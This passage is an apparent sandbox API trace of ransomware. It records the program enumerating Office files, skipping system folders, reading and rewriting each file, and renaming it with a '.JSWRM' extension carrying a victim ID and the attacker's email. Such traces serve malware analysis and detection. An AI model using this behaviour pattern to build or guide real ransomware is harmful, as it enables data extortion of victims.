(lpString1="officeinventoryagentlogon.xml", lpString2="documents and settings") returned 1 [0115.406] lstrcmpiW (lpString1="officeinventoryagentlogon.xml", lpString2="$RECYCLE.BIN") returned 1 [0115.406] lstrcmpiW (lpString1="officeinventoryagentlogon.xml", lpString2="system volume information") returned -1 [0115.406] lstrcmpiW (lpString1="officeinventoryagentlogon.xml", lpString2="msocache") returned 1 [0115.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0115.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officeinventoryagentlogon.xml", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0115.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0115.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officeinventoryagentlogon.xml", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officeinventoryagentlogon.xml", lpUsedDefaultChar=0x0) returned 29 [0115.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0115.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0115.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officeinventoryagentlogon.xml", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0115.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0115.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officeinventoryagentlogon.xml", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officeinventoryagentlogon.xml", lpUsedDefaultChar=0x0) returned 29 [0115.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0115.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0115.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0115.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0115.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\officeinventoryagentlogon.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\officeinventoryagentlogon.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.407] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3318) returned 1 [0115.408] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcf0) returned 0x206858 [0115.408] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xcf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xcf0, lpOverlapped=0x0) returned 1 [0115.413] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.413] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xcf0, lpOverlapped=0x0) returned 1 [0115.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0115.413] CloseHandle (hObject=0x238) returned 1 [0115.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0115.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0115.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0115.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0115.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0115.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0115.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.414] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\officeinventoryagentlogon.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\officeinventoryagentlogon.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\officeinventoryagentlogon.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\officeinventoryagentlogon.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0115.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0115.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0115.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0115.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0115.415] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf637b042, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf637b042, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9bcfaf5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x610c0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OMSINTL.DLL", cAlternateFileName="")) returned 1 [0115.415] lstrcmpiW (lpString1="OMSINTL.DLL", lpString2=".") returned 1 [0115.415] lstrcmpiW (lpString1="OMSINTL.DLL", lpString2="..") returned 1 [0115.415] lstrcmpiW (lpString1="OMSINTL.DLL", lpString2="...") returned 1 [0115.415] lstrcmpiW (lpString1="OMSINTL.DLL", lpString2="windows") returned -1 [0115.415] lstrcmpiW (lpString1="OMSINTL.DLL", lpString2="recovery") returned -1 [0115.415] lstrcmpiW (lpString1="OMSINTL.DLL", lpString2="perflogs") returned -1 [0115.415] lstrcmpiW (lpString1="OMSINTL.DLL", lpString2="documents and settings") returned 1 [0115.415] lstrcmpiW (lpString1="OMSINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0115.415] lstrcmpiW (lpString1="OMSINTL.DLL", lpString2="system volume information") returned -1 [0115.416] lstrcmpiW (lpString1="OMSINTL.DLL", lpString2="msocache") returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0115.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSINTL.DLL", lpUsedDefaultChar=0x0) returned 11 [0115.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0115.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSINTL.DLL", lpUsedDefaultChar=0x0) returned 11 [0115.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0115.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0115.416] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf016e209, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf016e209, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9bcfaf5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d1cc, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ONENOTE.HXS", cAlternateFileName="")) returned 1 [0115.416] lstrcmpiW (lpString1="ONENOTE.HXS", lpString2=".") returned 1 [0115.416] lstrcmpiW (lpString1="ONENOTE.HXS", lpString2="..") returned 1 [0115.416] lstrcmpiW (lpString1="ONENOTE.HXS", lpString2="...") returned 1 [0115.416] lstrcmpiW (lpString1="ONENOTE.HXS", lpString2="windows") returned -1 [0115.416] lstrcmpiW (lpString1="ONENOTE.HXS", lpString2="recovery") returned -1 [0115.416] lstrcmpiW (lpString1="ONENOTE.HXS", lpString2="perflogs") returned -1 [0115.416] lstrcmpiW (lpString1="ONENOTE.HXS", lpString2="documents and settings") returned 1 [0115.416] lstrcmpiW (lpString1="ONENOTE.HXS", lpString2="$RECYCLE.BIN") returned 1 [0115.416] lstrcmpiW (lpString1="ONENOTE.HXS", lpString2="system volume information") returned -1 [0115.416] lstrcmpiW (lpString1="ONENOTE.HXS", lpString2="msocache") returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0115.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.HXS", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE.HXS", lpUsedDefaultChar=0x0) returned 11 [0115.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0115.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0115.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.HXS", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE.HXS", lpUsedDefaultChar=0x0) returned 11 [0115.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0115.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0115.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0115.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.417] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=250316) returned 1 [0115.417] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0115.417] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0115.428] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.428] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0115.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0115.428] CloseHandle (hObject=0x238) returned 1 [0115.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0115.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0115.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0115.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0115.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0115.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0115.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0115.429] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0115.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0115.430] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ba9874, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ba9874, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9bcfaf5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ONENOTE_COL.HXC", cAlternateFileName="ONENOT~1.HXC")) returned 1 [0115.430] lstrcmpiW (lpString1="ONENOTE_COL.HXC", lpString2=".") returned 1 [0115.430] lstrcmpiW (lpString1="ONENOTE_COL.HXC", lpString2="..") returned 1 [0115.430] lstrcmpiW (lpString1="ONENOTE_COL.HXC", lpString2="...") returned 1 [0115.430] lstrcmpiW (lpString1="ONENOTE_COL.HXC", lpString2="windows") returned -1 [0115.430] lstrcmpiW (lpString1="ONENOTE_COL.HXC", lpString2="recovery") returned -1 [0115.430] lstrcmpiW (lpString1="ONENOTE_COL.HXC", lpString2="perflogs") returned -1 [0115.430] lstrcmpiW (lpString1="ONENOTE_COL.HXC", lpString2="documents and settings") returned 1 [0115.430] lstrcmpiW (lpString1="ONENOTE_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0115.430] lstrcmpiW (lpString1="ONENOTE_COL.HXC", lpString2="system volume information") returned -1 [0115.430] lstrcmpiW (lpString1="ONENOTE_COL.HXC", lpString2="msocache") returned 1 [0115.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0115.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0115.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0115.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0115.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0115.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0115.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0115.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0115.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0115.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.431] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=631) returned 1 [0115.431] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0115.431] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0115.433] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.433] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0115.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0115.433] CloseHandle (hObject=0x238) returned 1 [0115.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0115.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0115.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0115.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0115.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0115.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0115.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0115.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 